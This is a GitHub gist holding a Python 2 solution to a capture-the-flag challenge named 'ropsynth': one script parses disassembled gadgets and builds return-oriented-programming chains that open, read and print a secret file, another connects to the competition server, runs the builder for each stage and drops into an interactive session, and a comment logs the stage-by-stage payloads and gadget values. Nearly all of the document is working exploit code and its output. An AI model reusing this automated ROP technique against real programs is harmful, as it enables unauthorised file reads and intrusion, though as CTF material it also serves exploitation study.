Skip to content

Instantly share code, notes, and snippets.

@otms61 otms61/r.py
Created Dec 11, 2016

Embed
What would you like to do?
#!/usr/bin/python
# -*- coding: utf-8 -*-
import struct
import binascii
def p(a):
return struct.pack("<Q", a)
def u(a):
return struct.unpack("<Q", a)[0]
def calc_gadgets(line_itr):
gadgets = []
while True:
g1_line = line_itr.next()
g1_line = g1_line.split()
if g1_line[1] == 'hlt':
continue
if g1_line[1] == 'ret':
print '[*] ret is found!'
break
target = g1_line[2]
inst_list = []
# print '[*] {} is target!'.format(target)
for g_line in line_itr:
if 'je' in g_line:
# print inst_list
break
insts = g_line.split()
v = int(insts[2].split(',')[1], 0x10)
inst_list.append([insts[1], v])
inst = inst_list.pop()
assert(inst[0] == 'cmp')
gadget_val = inst[1]
while len(inst_list) > 0:
inst = inst_list.pop()
if inst[0] == 'sub':
gadget_val += inst[1]
elif inst[0] == 'add':
gadget_val -= inst[1]
elif inst[0] == 'xor':
gadget_val ^= inst[1]
else:
assert(False)
gadget_val &= 0xffffffffffffffff
print " gadget value is {:#x}".format(gadget_val)
gadgets.append(gadget_val)
return gadgets
fp = open('dumped').read().split('\n')
gadgets = {}
line_itr = iter(fp[7:-1])
SECRET_STR_ADDR = 0x00a00000
BUFF_ADDR = 0x00a00100
for line in line_itr:
line = line.split(':')
line_n = int(line[0].strip(), 0x10) + 0x00800000
inst_raw = line[1].strip()
if 'rsi' in inst_raw:
print '[+] rsi gadgets found!'
gn = 'rsi'
elif 'rdi' in inst_raw:
print '[+] rdi gadgets found!'
gn = 'rdi'
elif 'rdx' in inst_raw:
print '[+] rdx gadgets found!'
gn = 'rdx'
elif 'syscall' in inst_raw:
print '[+] syscall gadgets found!'
gn = 'syscall'
elif 'rax' in inst_raw:
if 'push' in inst_raw:
continue
print '[+] rax gadgets found!'
gn = 'rax'
else:
continue
g = calc_gadgets(line_itr)
print g
gadgets[gn] = {'addr': line_n, 'gadgets': g}
def build_rop_gadget(target_ins, val=0, pop_eax=False):
addr = gadgets[target_ins]['addr']
rop_gadgets = []
if target_ins == 'syscall':
rop_gadgets.append(addr)
print '{:>8}: {:8x}'.format(target_ins, addr)
else:
if pop_eax:
rop_gadgets.append(addr-1)
print '{:>8}: {:8x}'.format(target_ins, addr-1)
else:
rop_gadgets.append(addr)
rop_gadgets.append(val)
print '{:>8}: {:8x}'.format(target_ins, addr)
print '{:>8}: {:8x}'.format('val', val)
for v in gadgets[target_ins]['gadgets']:
rop_gadgets.append(v)
print '{:>8}: {:8x}'.format('', v)
# print rop_gadgets
return ''.join(map(p, rop_gadgets))
payload = ''
# fd = open('secret', 0, 0)
payload += build_rop_gadget('rax', 2)
payload += build_rop_gadget('rdi', SECRET_STR_ADDR)
payload += build_rop_gadget('rsi', 0)
payload += build_rop_gadget('rdx', 0)
payload += build_rop_gadget('syscall')
# len = read(fd, buf, 256)
payload += build_rop_gadget('rdi', pop_eax=True)
payload += build_rop_gadget('rax', 0)
payload += build_rop_gadget('rsi', BUFF_ADDR)
payload += build_rop_gadget('rdx', 256)
payload += build_rop_gadget('syscall')
# write(1, buf, len)
payload += build_rop_gadget('rdx', pop_eax=True)
payload += build_rop_gadget('rax', 1)
payload += build_rop_gadget('rdi', 1)
payload += build_rop_gadget('rsi', BUFF_ADDR)
payload += build_rop_gadget('syscall')
# print payload.encode('base64')
b_payload = binascii.b2a_base64(payload)
print b_payload
ofp = open('payload', 'w')
ofp.write(b_payload)
ofp.close()
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import struct
import telnetlib
import os
def sock(remoteip, remoteport):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((remoteip, remoteport))
f = s.makefile('rw', bufsize=0)
return s, f
def read_until(f, delim='\n'):
data = ''
while not data.endswith(delim):
data += f.read(1)
return data
def shell(s):
t = telnetlib.Telnet()
t.sock = s
t.interact()
# s, f = sock('localhost', 4444)
s, f = sock('ropsynth.pwn.seccon.jp', 10000)
print read_until(f)
def attack():
encoded = read_until(f)
print 'encoded'
print encoded
fp = open('bin', 'w')
fp.write(encoded.decode('base64'))
fp.close()
os.system('objdump --no-show-raw-insn -Mintel,x86-64 -b binary -D -m i386 ./bin > dumped')
os.system('python r.py')
fg = open('payload').read()
f.write(fg)
attack()
for _ in range(4):
print read_until(f, 'stage')
print read_until(f)
attack()
shell(s)
@otms61

This comment has been minimized.

Copy link
Owner Author

commented Dec 11, 2016

$ python x.py
stage 1/5
stage 1/5

encoded
9PT09FBaWUiB8csfwExIgcG0dcNWSIHBLJkJFEiB6ZDMjGBIgcHmOGUGSIHBnyVoUkiB6QWr3k5IgfnWISUNdAL09EFfSYHvqv3xC0mB91FikSJJge/HwM5iSYHvD2xYa0mB78vFgQlJgf/e24ZGdAL09EFbSYHzvUOMH0mB80DGkgJJgcMzkVlZSYHrV5Q3EkmB62G7CwVJgftzrgBLdAP09PRBXEmB7C2VsFNJgewyBRYDSYHsYNMrJkmBxCGqAgVJgfQ0GPs+SYH0h80UY0mBxGZzpgRJgcRbaUosSYH89RrmRHQH9PT09PT09FtIgfNIl2VLSIHrF4jiS0iB852X80hIgcN+xN4kSIHzwNjbFEiB+9xXgXR0BfT09PT0WUiB6diYbCRIgfFVsQ4zSIHpJ+GAVUiBweKjWjxIgfFx81kbSIHBoQZBHEiB+SvaeSB0B/T09PT09PTD9PT09PT09PQPBVtIgfODB6EjSIH7MmLTIXQG9PT09PT0QVxJgey5hggSSYHEPlJaL0mB9AL9yTRJgewornt0SYHEgLmUX0mB7CaG4lJJgfyQZRpQdAX09PT09EFeSYHuWWtsR0mB9msfWjdJgf6CiGZXdAn09PT09PT09PTD9PT09PT09FhbSIHzQ3uSaEiB87PTejRIgetVJLxmSIHrWsUcQEiB6zvnCjBIgetvg686SIH7h5eLRHQJ9PT09PT09PT0w/T0XkFeSYHGp0c0HEmB7nTGhDlJge7iaIUFSYH2h3hCE0mBxku8vQRJgf5tEYYcdAn09PT09PT09PRZSIHxAcgEPkiB8R4ag3dIgfEu3VJjSIHx5NBQLkiB6atUAlZIgflod5cqdAT09PT0W0iB8xvVrzlIgevKP18+SIHzF5qcW0iB8/6rOh1IgcMbp9c5SIH7sXxHfXQI9PT09PT09PRBW0mB84Ms/y9JgcObnUJ5SYHzGqJzIkmB87dMBgFJgeu1z1ksSYHDaSJOJEmB60RWfnFJgfvwR/AydAP09PRbSIHzGWDbckiB88eWfDZIgfP7Fh1VSIH7GmFWUnQJ9PT09PT09PT0XUiB7WyLfUFIgf1KbElzdAP09PRBX0mB7/TqQidJgffT3yJXSYHvMyHZf0mB/wltaEJ0CPT09PT09PT0w/T0UF9BXkmBxvIZCj5JgfbMrWtCSYHuKY2XQkmBxtdk3iJJgf4ARJJWdAT09PT0QV1JgfWRk6xtSYHtfPNkP0mBxR3jqTlJgcUcedElSYH1VomsMEmB7aw2+zRJgf2Z1V1VdAP09PTD

[+] rdx gadgets found!
 gadget value is 0xffffffffb43633cd
 gadget value is 0x148b0a9d8
 gadget value is 0x15f4e905
 gadget value is 0xc60aaf25
 gadget value is 0xf40f7252
 gadget value is 0x2ff687ed
[*] ret is found!
[+] syscall gadgets found!
 gadget value is 0x27265b1
 gadget value is 0x65d851d7
 gadget value is 0xa7a90342
[*] ret is found!
[+] rax gadgets found!
 gadget value is 0x10af64310
[*] ret is found!
[+] rsi gadgets found!
 gadget value is 0x27601554
 gadget value is 0x841c13c6
 gadget value is 0x7d86f152
 gadget value is 0x3a322b11
 gadget value is 0x43ec813f
 gadget value is 0xb4c6f7b6
 gadget value is 0xbca63ce3
[*] ret is found!
[+] rdi gadgets found!
 gadget value is 0xfffffffff616a7ac
 gadget value is 0xf7738fc7
[*] ret is found!
   rax:      8001e1
   val:        2
    :    10af64310
   rdi:      800367
   val:      a00000
    : fffffffff616a7ac
    :     f7738fc7
   rsi:      800222
   val:        0
    :     27601554
    :     841c13c6
    :     7d86f152
    :     3a322b11
    :     43ec813f
    :     b4c6f7b6
    :     bca63ce3
   rdx:      800005
   val:        0
    : ffffffffb43633cd
    :    148b0a9d8
    :     15f4e905
    :     c60aaf25
    :     f40f7252
    :     2ff687ed
 syscall:      800164
    :     27265b1
    :     65d851d7
    :     a7a90342
   rdi:      800366
    : fffffffff616a7ac
    :     f7738fc7
   rax:      8001e1
   val:        0
    :    10af64310
   rsi:      800222
   val:      a00100
    :     27601554
    :     841c13c6
    :     7d86f152
    :     3a322b11
    :     43ec813f
    :     b4c6f7b6
    :     bca63ce3
   rdx:      800005
   val:       100
    : ffffffffb43633cd
    :    148b0a9d8
    :     15f4e905
    :     c60aaf25
    :     f40f7252
    :     2ff687ed
 syscall:      800164
    :     27265b1
    :     65d851d7
    :     a7a90342
   rdx:      800004
    : ffffffffb43633cd
    :    148b0a9d8
    :     15f4e905
    :     c60aaf25
    :     f40f7252
    :     2ff687ed
   rax:      8001e1
   val:        1
    :    10af64310
   rdi:      800367
   val:        1
    : fffffffff616a7ac
    :     f7738fc7
   rsi:      800222
   val:      a00100
    :     27601554
    :     841c13c6
    :     7d86f152
    :     3a322b11
    :     43ec813f
    :     b4c6f7b6
    :     bca63ce3
 syscall:      800164
    :     27265b1
    :     65d851d7
    :     a7a90342
4QGAAAAAAAACAAAAAAAAABBD9goBAAAAZwOAAAAAAAAAAKAAAAAAAKynFvb/////x49z9wAAAAAiAoAAAAAAAAAAAAAAAAAAVBVgJwAAAADGExyEAAAAAFLxhn0AAAAAESsyOgAAAAA/gexDAAAAALb3xrQAAAAA4zymvAAAAAAFAIAAAAAAAAAAAAAAAAAAzTM2tP/////YqbBIAQAAAAXp9BUAAAAAJa8KxgAAAABScg/0AAAAAO2H9i8AAAAAZAGAAAAAAACxZXICAAAAANdR2GUAAAAAQgOppwAAAABmA4AAAAAAAKynFvb/////x49z9wAAAADhAYAAAAAAAAAAAAAAAAAAEEP2CgEAAAAiAoAAAAAAAAABoAAAAAAAVBVgJwAAAADGExyEAAAAAFLxhn0AAAAAESsyOgAAAAA/gexDAAAAALb3xrQAAAAA4zymvAAAAAAFAIAAAAAAAAABAAAAAAAAzTM2tP/////YqbBIAQAAAAXp9BUAAAAAJa8KxgAAAABScg/0AAAAAO2H9i8AAAAAZAGAAAAAAACxZXICAAAAANdR2GUAAAAAQgOppwAAAAAEAIAAAAAAAM0zNrT/////2KmwSAEAAAAF6fQVAAAAACWvCsYAAAAAUnIP9AAAAADth/YvAAAAAOEBgAAAAAAAAQAAAAAAAAAQQ/YKAQAAAGcDgAAAAAAAAQAAAAAAAACspxb2/////8ePc/cAAAAAIgKAAAAAAAAAAaAAAAAAAFQVYCcAAAAAxhMchAAAAABS8YZ9AAAAABErMjoAAAAAP4HsQwAAAAC298a0AAAAAOM8prwAAAAAZAGAAAAAAACxZXICAAAAANdR2GUAAAAAQgOppwAAAAA=

OK
stage
 2/5

encoded
9PT09PT09PRYQVtJgcNp2Fc4SYHzo/haZEmB+y5GBxh0B/T09PT09PRBW0mB63qFBlFJgcNRXwlqSYHruQ9VAEmB64/TNRdJgcMm7Qs1SYHrJLmYH0mB6+RuNjZJgevCjPVTSYH7elK4MHQE9PT09FtIgfNNa6UPSIHze87FUEiB8ydcYWlIgcM3LQoKSIH7nmw5ZHQJ9PT09PT09PT0QV9Jgfd+F60/SYHvf9waTUmB95TLOTtJgfd2TFAjSYHH+8wBVkmB/+1h2Ux0A/T09MP0DwVbSIHzT1OMeEiBw7EYtEtIgfPa58h/SIHr1d+NBUiB+7l4oBB0AvT0W0iB6zLT6U9IgetNb4YlSIHrVdpJJ0iB+9gDsRN0B/T09PT09PRZSIHpf72UF0iBwfE60mpIgfl9WF4FdAj09PT09PT09EFfSYHHjaT2OkmBx8uvOnxJgcdHnqs9SYH3xn2OQEmBx4LotW5Jgccb/LYmSYH3iNDGQkmB/8V6h050BfT09PT0W0iB8394YT5IgcPB5r4bSIHzunz5OUiBwxz/iXZIgcNfZDgPSIHDlA+ORkiB8xrcjE5IgfsX0XA/dAX09PT09EFfSYH3hJCzKEmBx7oXXklJgfc1g7MJSYHHCq2gFkmBx/pBxBFJgfeOCCsHSYH3rZCAQkmBx0JA9UZJgf8yQEMKdAb09PT09PTD9PT09FBfQV9JgceE6rRDSYH3cm5JEkmBx5gJgmtJgfeEb/8cSYH3EktPakmB78x5GwFJgccT3soPSYH3Z6rtHEmB/3aG50x0AvT0w/T0UFpbSIHD0lhVR0iBw3+ouklIgesI1GgaSIHzp90IBkiB+2I2JFB0BPT09PRBXkmB9t2Q1GxJge4wRvlJSYH+UpyjO3QG9PT09PT0XUiB9daIznxIgcWGf3oGSIH9pvMrU3QC9PRBXEmB7AHSF0pJgfSsD3IxSYH0lKH9U0mBxOLNylBJgfwpO1oldAX09PT09MP09PT09F5BXkmB7rVKg2lJge7j5xI8SYH2v481TkmBxvZAEGJJgf504zQFdAT09PT0ww==

[+] rax gadgets found!
 gadget value is 0x4405e624
 gadget value is 0xa3f9238f
 gadget value is 0x6c2ec676
 gadget value is 0x475f8f1
[*] ret is found!
[+] syscall gadgets found!
 gadget value is 0x66bef5ec
 gadget value is 0xb06b20ac
 gadget value is 0xffffffffb220db0b
 gadget value is 0xfffffffe417dc5d7
 gadget value is 0xffffffffbef286fc
 gadget value is 0xffffffff256774c4
[*] ret is found!
[+] rdi gadgets found!
 gadget value is 0xffffffff9a6ccd32
[*] ret is found!
[+] rdx gadgets found!
 gadget value is 0xffffffffdf85be7c
 gadget value is 0xe948725f
 gadget value is 0x307ffcf6
 gadget value is 0x189580
[*] ret is found!
[+] rsi gadgets found!
 gadget value is 0x92a76059
[*] ret is found!
   rax:      800008
   val:        2
    :     4405e624
    :     a3f9238f
    :     6c2ec676
    :     475f8f1
   rdi:      800212
   val:      a00000
    : ffffffff9a6ccd32
   rsi:      8002f2
   val:        0
    :     92a76059
   rdx:      80025c
   val:        0
    : ffffffffdf85be7c
    :     e948725f
    :     307ffcf6
    :      189580
 syscall:      8000d2
    :     66bef5ec
    :     b06b20ac
    : ffffffffb220db0b
    : fffffffe417dc5d7
    : ffffffffbef286fc
    : ffffffff256774c4
   rdi:      800211
    : ffffffff9a6ccd32
   rax:      800008
   val:        0
    :     4405e624
    :     a3f9238f
    :     6c2ec676
    :     475f8f1
   rsi:      8002f2
   val:      a00100
    :     92a76059
   rdx:      80025c
   val:       100
    : ffffffffdf85be7c
    :     e948725f
    :     307ffcf6
    :      189580
 syscall:      8000d2
    :     66bef5ec
    :     b06b20ac
    : ffffffffb220db0b
    : fffffffe417dc5d7
    : ffffffffbef286fc
    : ffffffff256774c4
   rdx:      80025b
    : ffffffffdf85be7c
    :     e948725f
    :     307ffcf6
    :      189580
   rax:      800008
   val:        1
    :     4405e624
    :     a3f9238f
    :     6c2ec676
    :     475f8f1
   rdi:      800212
   val:        1
    : ffffffff9a6ccd32
   rsi:      8002f2
   val:      a00100
    :     92a76059
 syscall:      8000d2
    :     66bef5ec
    :     b06b20ac
    : ffffffffb220db0b
    : fffffffe417dc5d7
    : ffffffffbef286fc
    : ffffffff256774c4
CACAAAAAAAACAAAAAAAAACTmBUQAAAAAjyP5owAAAAB2xi5sAAAAAPH4dQQAAAAAEgKAAAAAAAAAAKAAAAAAADLNbJr/////8gKAAAAAAAAAAAAAAAAAAFlgp5IAAAAAXAKAAAAAAAAAAAAAAAAAAHy+hd//////X3JI6QAAAAD2/H8wAAAAAICVGAAAAAAA0gCAAAAAAADs9b5mAAAAAKwga7AAAAAAC9sgsv/////XxX1B/v////yG8r7/////xHRnJf////8RAoAAAAAAADLNbJr/////CACAAAAAAAAAAAAAAAAAACTmBUQAAAAAjyP5owAAAAB2xi5sAAAAAPH4dQQAAAAA8gKAAAAAAAAAAaAAAAAAAFlgp5IAAAAAXAKAAAAAAAAAAQAAAAAAAHy+hd//////X3JI6QAAAAD2/H8wAAAAAICVGAAAAAAA0gCAAAAAAADs9b5mAAAAAKwga7AAAAAAC9sgsv/////XxX1B/v////yG8r7/////xHRnJf////9bAoAAAAAAAHy+hd//////X3JI6QAAAAD2/H8wAAAAAICVGAAAAAAACACAAAAAAAABAAAAAAAAACTmBUQAAAAAjyP5owAAAAB2xi5sAAAAAPH4dQQAAAAAEgKAAAAAAAABAAAAAAAAADLNbJr/////8gKAAAAAAAAAAaAAAAAAAFlgp5IAAAAA0gCAAAAAAADs9b5mAAAAAKwga7AAAAAAC9sgsv/////XxX1B/v////yG8r7/////xHRnJf////8=

OK
stage
 3/5

encoded
9PT09PReQVtJgfM9oXowSYHztuCXRUmBw2wvcydJgevuc2xtSYH70vSPDXQH9PT09PT09EFeSYH2qbqxaEmBxuVP3VZJgcZ01WxMSYH2VJWwT0mB9mMyQmdJge5jTnkzSYH+OS9zFHQC9PRBW0mB8/xC8GJJgcPmUUZSSYH7TKPHRnQE9PT09EFfSYH3lGirMkmB76ry1ElJge9ultw2SYH3I6teJkmBx7+1NHRJgf8gA1ktdAj09PT09PT09EFcSYHsKaJEfkmBxNMdrwRJgfSmBL9HSYHE5APhFEmBxKGACitJgfR9pVdqSYH0He8+Z0mB9AXxeR9JgfxQMuRBdAL09EFdSYH1mD1XJ0mB9YgSKhhJgf2HwIdHdAX09PT09F1IgfXOh6csSIH1ViZqV0iB/WHegU50BvT09PT09FlIgelLjvdtSIHB2QjvR0iB8UYP/1JIgfHwGnxBSIHxv+FGN0iB8Zp9ERBIgcHFDwZDSIH5qsX0cXQC9PTD9FBfQV1Jge3c1RZ3SYHt0FZNc0mB7R4jXFZJge0xMB5wSYHtvgQtAkmBxfoDASNJgf19ANVudAj09PT09PT09F1Ige2DpG8BSIHt5xDNGEiBxXbrJ1tIgfU73pZmSIH9/eN4HHQC9PRBXUmB7UTIm0tJge1ZqecvSYH1K+l/MEmBxaTgnQBJgfXfJ/AsSYHFfPJ9D0mB/fIrtSd0A/T09FtIgcPjadI/SIHzkcLzUEiB8wc2WkZIgcN7uEgASIH74pKqE3QE9PT09EFeSYHuOQFKK0mBxjk6+h1JgcZHfaQSSYH+udhOOXQF9PT09PRdSIHF30okIUiB/XWIOWB0BfT09PT0W0iB8yrNZWhIgfNwZi9ESIHzx8XWGEiBww/qMmRIgfMW0KhaSIH7PYrMOHQC9PTD9PQPBUFfSYHvQOXrQ0mB91u7agBJgfebpVE4SYHHoVOMfUmB9yfNHi5JgcdXNfpMSYH/h8ZVFnQF9PT09PRbSIHrsbTiCkiB86GkOjtIgfuzdxYLdAb09PT09PRBXkmBxrW1t1NJgf7uV7lSdAn09PT09PT09PRBXEmB9GfU5hVJgex6d+EGSYH08uBhSkmB9LJxellJgfyT/+00dAL09EFbSYHDYwx2CUmB8173uBJJgfM9bFFWSYHD23GGakmB64JvGj1JgcNvXj0SSYHzQV+cfkmB80HnbzpJgfsAKUJZdAn09PT09PT09PRBXEmB9EJexhdJgfRCx2BbSYH0iXbFBkmB7NIgdg5JgfSu3YkmSYH8AwN/GnQF9PT09PRBXkmBxiPs1WdJgcZGPrpJSYHuZsCzLUmB9pbY80tJgcZKwpcASYH+Rr37E3QJ9PT09PT09PT0w/T09PRYQV5Jge4hudRASYHGnM9JKkmB9pbX3SpJgfZnxoMESYHu32ZGCkmB7klmzH9JgcafBPl7SYH+PH2KS3QG9PT09PT0QVxJgfRtXJ1aSYH8AAued3QE9PT09EFdSYH1YQ3sfkmBxQPLnSBJgcUps3BmSYHFgBFND0mB9RuI71NJgf0ifmY8dAL09FtIgcPfoGlSSIHDXPZaHUiB8/fxBWdIgeuyiwo/SIHrgL48OUiBw+ACYQZIgevBIcksSIHzfJAba0iB+xDhHBl0BfT09PT0W0iB69FEs3JIgfNVUhpYSIHrWqeadEiB652QXzxIgfNiBo5GSIHD0vtXEkiBw29cKy1Igft2Fho7dAP09PTD9PT0UFpBXkmB7gpzRXNJgca7l7ctSYHugQ7nPkmB7jRZhGhJgcZ5k9MGSYHuYUbPWkmBxkq+Xk5Jgf5cWpoedAT09PT0ww==

[+] rsi gadgets found!
 gadget value is 0x266478df
 gadget value is 0xffffffffa3650ffb
 gadget value is 0xffffffff9671139a
 gadget value is 0x128707ce
 gadget value is 0xcd4b846c
 gadget value is 0x78faef97
 gadget value is 0x354c7ff9
 gadget value is 0x4042c1e8
[*] ret is found!
[+] rdi gadgets found!
 gadget value is 0x1fedf813c
 gadget value is 0x3a0307ba
 gadget value is 0x7fda48cb
 gadget value is 0xffffffffc5f5c50e
 gadget value is 0x33fa2272
 gadget value is 0x3f153d96
 gadget value is 0xffffffffcaad1e81
[*] ret is found!
[+] syscall gadgets found!
 gadget value is 0xffffffff956dfbf6
 gadget value is 0x3b0f87c3
 gadget value is 0xffffffffff01a239
 gadget value is 0x3b31322a
 gadget value is 0xffffffff916b9ef8
 gadget value is 0x10f10f6
 gadget value is 0xffffffffd4b3b867
[*] ret is found!
[+] rax gadgets found!
 gadget value is 0x8e853db9
 gadget value is 0x2d03576d
 gadget value is 0xffffffffa7c26bec
 gadget value is 0x107ee944d
 gadget value is 0xa8bbe6ec
[*] ret is found!
[+] rdx gadgets found!
 gadget value is 0x1113091fe
[*] ret is found!
   rax:      80040d
   val:        2
    :     8e853db9
    :     2d03576d
    : ffffffffa7c26bec
    :    107ee944d
    :     a8bbe6ec
   rdi:      80017f
   val:      a00000
    :    1fedf813c
    :     3a0307ba
    :     7fda48cb
    : ffffffffc5f5c50e
    :     33fa2272
    :     3f153d96
    : ffffffffcaad1e81
   rsi:      800005
   val:        0
    :     266478df
    : ffffffffa3650ffb
    : ffffffff9671139a
    :     128707ce
    :     cd4b846c
    :     78faef97
    :     354c7ff9
    :     4042c1e8
   rdx:      800520
   val:        0
    :    1113091fe
 syscall:      8002b4
    : ffffffff956dfbf6
    :     3b0f87c3
    : ffffffffff01a239
    :     3b31322a
    : ffffffff916b9ef8
    :     10f10f6
    : ffffffffd4b3b867
   rdi:      80017e
    :    1fedf813c
    :     3a0307ba
    :     7fda48cb
    : ffffffffc5f5c50e
    :     33fa2272
    :     3f153d96
    : ffffffffcaad1e81
   rax:      80040d
   val:        0
    :     8e853db9
    :     2d03576d
    : ffffffffa7c26bec
    :    107ee944d
    :     a8bbe6ec
   rsi:      800005
   val:      a00100
    :     266478df
    : ffffffffa3650ffb
    : ffffffff9671139a
    :     128707ce
    :     cd4b846c
    :     78faef97
    :     354c7ff9
    :     4042c1e8
   rdx:      800520
   val:       100
    :    1113091fe
 syscall:      8002b4
    : ffffffff956dfbf6
    :     3b0f87c3
    : ffffffffff01a239
    :     3b31322a
    : ffffffff916b9ef8
    :     10f10f6
    : ffffffffd4b3b867
   rdx:      80051f
    :    1113091fe
   rax:      80040d
   val:        1
    :     8e853db9
    :     2d03576d
    : ffffffffa7c26bec
    :    107ee944d
    :     a8bbe6ec
   rdi:      80017f
   val:        1
    :    1fedf813c
    :     3a0307ba
    :     7fda48cb
    : ffffffffc5f5c50e
    :     33fa2272
    :     3f153d96
    : ffffffffcaad1e81
   rsi:      800005
   val:      a00100
    :     266478df
    : ffffffffa3650ffb
    : ffffffff9671139a
    :     128707ce
    :     cd4b846c
    :     78faef97
    :     354c7ff9
    :     4042c1e8
 syscall:      8002b4
    : ffffffff956dfbf6
    :     3b0f87c3
    : ffffffffff01a239
    :     3b31322a
    : ffffffff916b9ef8
    :     10f10f6
    : ffffffffd4b3b867
DQSAAAAAAAACAAAAAAAAALk9hY4AAAAAbVcDLQAAAADsa8Kn/////02U7gcBAAAA7Oa7qAAAAAB/AYAAAAAAAAAAoAAAAAAAPIHf/gEAAAC6BwM6AAAAAMtI2n8AAAAADsX1xf////9yIvozAAAAAJY9FT8AAAAAgR6tyv////8FAIAAAAAAAAAAAAAAAAAA33hkJgAAAAD7D2Wj/////5oTcZb/////zgeHEgAAAABshEvNAAAAAJfv+ngAAAAA+X9MNQAAAADowUJAAAAAACAFgAAAAAAAAAAAAAAAAAD+kTARAQAAALQCgAAAAAAA9vttlf/////Dhw87AAAAADmiAf//////KjIxOwAAAAD4nmuR//////YQDwEAAAAAZ7iz1P////9+AYAAAAAAADyB3/4BAAAAugcDOgAAAADLSNp/AAAAAA7F9cX/////ciL6MwAAAACWPRU/AAAAAIEercr/////DQSAAAAAAAAAAAAAAAAAALk9hY4AAAAAbVcDLQAAAADsa8Kn/////02U7gcBAAAA7Oa7qAAAAAAFAIAAAAAAAAABoAAAAAAA33hkJgAAAAD7D2Wj/////5oTcZb/////zgeHEgAAAABshEvNAAAAAJfv+ngAAAAA+X9MNQAAAADowUJAAAAAACAFgAAAAAAAAAEAAAAAAAD+kTARAQAAALQCgAAAAAAA9vttlf/////Dhw87AAAAADmiAf//////KjIxOwAAAAD4nmuR//////YQDwEAAAAAZ7iz1P////8fBYAAAAAAAP6RMBEBAAAADQSAAAAAAAABAAAAAAAAALk9hY4AAAAAbVcDLQAAAADsa8Kn/////02U7gcBAAAA7Oa7qAAAAAB/AYAAAAAAAAEAAAAAAAAAPIHf/gEAAAC6BwM6AAAAAMtI2n8AAAAADsX1xf////9yIvozAAAAAJY9FT8AAAAAgR6tyv////8FAIAAAAAAAAABoAAAAAAA33hkJgAAAAD7D2Wj/////5oTcZb/////zgeHEgAAAABshEvNAAAAAJfv+ngAAAAA+X9MNQAAAADowUJAAAAAALQCgAAAAAAA9vttlf/////Dhw87AAAAADmiAf//////KjIxOwAAAAD4nmuR//////YQDwEAAAAAZ7iz1P////8=

OK
stage
 4/5

encoded
9PT09PT0DwVZSIHxP5ByOEiB8anoqk1IgfF7zBVkSIHpMLV3O0iB6RAO9j1IgenBQb8ZSIHpOzDXa0iB+e2KLz10B/T09PT09PRZSIHp1BcgTUiB8ey3qFhIgcGMQbJmSIH5zfFHLnQH9PT09PT09EFcSYHE0KpcLkmBxPfm7CxJgcTt4ecLSYHsDs7vZkmB7ByEkihJgfRQ4CY+SYH0nlBWVEmB/DfBNXh0CPT09PT09PT0XUiB7STgxTpIgfUZzZxaSIH18dDJH0iB7WXZ9gxIgcWrcUFNSIH1seWuMkiB/SZQXkV0CPT09PT09PT0w/T0UF9BXkmB7sSu0ndJgf72idZVdAn09PT09PT09PRdSIHFPgP/XEiB9TKejRZIgcUHGHhGSIHFmgxAVEiB7fePtxdIge0grJdSSIH9pzL0OHQG9PT09PT0QV9Jge9M1/sLSYH/SCJuL3QF9PT09PRBXkmB7lYqg2dJge4xZOJySYHGqZI2a0mB/mQrzjF0CfT09PT09PT09MP09PT09PT0Xl1IgcXZBsgsSIH1dXeyTEiBxQHLUgJIgcVAcyM5SIH9XpuNC3QH9PT09PT09F1Ige2qNU5CSIHF+ON5TkiB9SeVEwtIgcUvmV9NSIHFc9ZPPEiBxWnEsCdIge3irjRNSIH9iAAHanQG9PT09PT0XUiB7dMzWlpIgfXpWeEpSIHtHrpbckiBxTwXfTdIgf2bQQAtdAP09PTD9PT0UFpBXUmB7Tn0ZWVJge2iF2s+SYHFZi/mSkmB7eT6EiBJgcW6lbtQSYHtt3kjIEmB9Yzm5mRJgf1OWp0ydAT09PT0QV5Jge74aa9ZSYHuD2YHREmB7sDd5SBJgfaGG0BASYH+scLwDHQD9PT0WUiB6TKUBCtIgemw5rNgSIHBP7DSKkiB+XdiAnB0CfT09PT09PT09EFbSYHrVf3QdkmB+4cnq090AvT0w/T0WEFeSYHuEFjJSUmB7oB7HktJgcabZhJqSYHulxsLEEmBxtm7WEtJge4h6VAXSYHuvsGVNkmBxtGciFxJgf5aqzx4dAb09PT09PRBXUmB7RHQmURJgcVORNsjSYHFPevtWUmBxeGlckhJgfWkp59fSYHt1f1PN0mBxdSsBk5JgcVjhBRQSYH9FZyOM3QG9PT09PT0ww==

[+] syscall gadgets found!
 gadget value is 0x12dfe74c4
 gadget value is 0xffffffffec5d1f81
 gadget value is 0x3a96506f
 gadget value is 0xadb8e0dd
[*] ret is found!
[+] rdi gadgets found!
 gadget value is 0xcda938ba
 gadget value is 0xffffffffc107d0f1
 gadget value is 0x3b69f994
 gadget value is 0xa0fd2742
[*] ret is found!
[+] rsi gadgets found!
 gadget value is 0xffffffff6fdd238f
 gadget value is 0x29d402a
 gadget value is 0xa899f167
[*] ret is found!
[+] rdx gadgets found!
 gadget value is 0x9ee17818
 gadget value is 0x10b4d86fe
 gadget value is 0xd0e82d1a
 gadget value is 0xc67c24dc
[*] ret is found!
[+] rax gadgets found!
 gadget value is 0x5922861b
 gadget value is 0xffffffff11bac9bc
[*] ret is found!
   rax:      8002d9
   val:        2
    :     5922861b
    : ffffffff11bac9bc
   rdi:      8000f4
   val:      a00000
    :     cda938ba
    : ffffffffc107d0f1
    :     3b69f994
    :     a0fd2742
   rsi:      800192
   val:        0
    : ffffffff6fdd238f
    :     29d402a
    :     a899f167
   rdx:      80022f
   val:        0
    :     9ee17818
    :    10b4d86fe
    :     d0e82d1a
    :     c67c24dc
 syscall:      800006
    :    12dfe74c4
    : ffffffffec5d1f81
    :     3a96506f
    :     adb8e0dd
   rdi:      8000f3
    :     cda938ba
    : ffffffffc107d0f1
    :     3b69f994
    :     a0fd2742
   rax:      8002d9
   val:        0
    :     5922861b
    : ffffffff11bac9bc
   rsi:      800192
   val:      a00100
    : ffffffff6fdd238f
    :     29d402a
    :     a899f167
   rdx:      80022f
   val:       100
    :     9ee17818
    :    10b4d86fe
    :     d0e82d1a
    :     c67c24dc
 syscall:      800006
    :    12dfe74c4
    : ffffffffec5d1f81
    :     3a96506f
    :     adb8e0dd
   rdx:      80022e
    :     9ee17818
    :    10b4d86fe
    :     d0e82d1a
    :     c67c24dc
   rax:      8002d9
   val:        1
    :     5922861b
    : ffffffff11bac9bc
   rdi:      8000f4
   val:        1
    :     cda938ba
    : ffffffffc107d0f1
    :     3b69f994
    :     a0fd2742
   rsi:      800192
   val:      a00100
    : ffffffff6fdd238f
    :     29d402a
    :     a899f167
 syscall:      800006
